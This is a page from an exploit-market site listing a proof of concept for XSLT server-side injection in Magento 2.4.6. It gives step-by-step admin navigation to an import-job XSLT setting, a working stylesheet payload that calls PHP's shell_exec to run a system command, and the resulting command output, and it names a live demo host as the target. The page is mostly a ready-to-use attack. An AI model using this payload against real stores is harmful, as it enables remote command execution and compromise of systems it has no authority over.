[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Magento 2.4.6 XSLT Server Side Injection / Command Execution Vulnerability

Author
tmrswrr
Risk
[
Security Risk High
]
0day-ID
0day-ID-39150
Category
web applications
Date add
17-11-2023
Platform
multiple
# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
# Exploit Author: tmrswrr
# Vendor Homepage: https://magento2demo.firebearstudio.com/
# Software Link:  https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip
# Version: 2.4.6
# Tested on: 2.4.6

POC:

1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/
2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit 
3 ) Click XSLT Configuration  and write this payload : 

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','id')" />
</xsl:template>
</xsl:stylesheet>

4 ) Click Test XSL Template , You will be see "id" command result :

<?xml version="1.0"?>
uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

#  0day.today [2024-11-15]  #